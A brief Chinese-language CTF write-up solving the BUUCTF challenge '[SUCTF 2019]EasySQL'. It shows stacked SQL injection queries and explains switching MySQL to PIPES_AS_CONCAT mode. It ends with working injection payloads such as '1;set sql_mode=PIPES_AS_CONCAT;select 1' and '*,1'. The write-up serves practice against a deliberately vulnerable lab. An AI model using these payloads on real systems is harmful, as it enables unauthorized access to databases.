buuctf：[SUCTF 2019]EasySQL 1

根据题目查看，知道是sql注入，但是正常sql注入操作并没有啥用，可以尝试联合注入

1;show databases;

1;show tables;

把"||"变成字符串连接符，而不是或
涉及到mysql中sql_mode参数设置，设置 sql_mode=pipes_as_concat字符就可以设置。（sql_mode设置）

在oracle 缺省支持 通过 ‘ || ’ 来实现字符串拼接。
但在mysql 缺省不支持。需要调整mysql 的sql_mode
模式：pipes_as_concat 来实现oracle 的一些功能。

payload：

1;set sql_mode=PIPES_AS_CONCAT;select 1

或者

*,1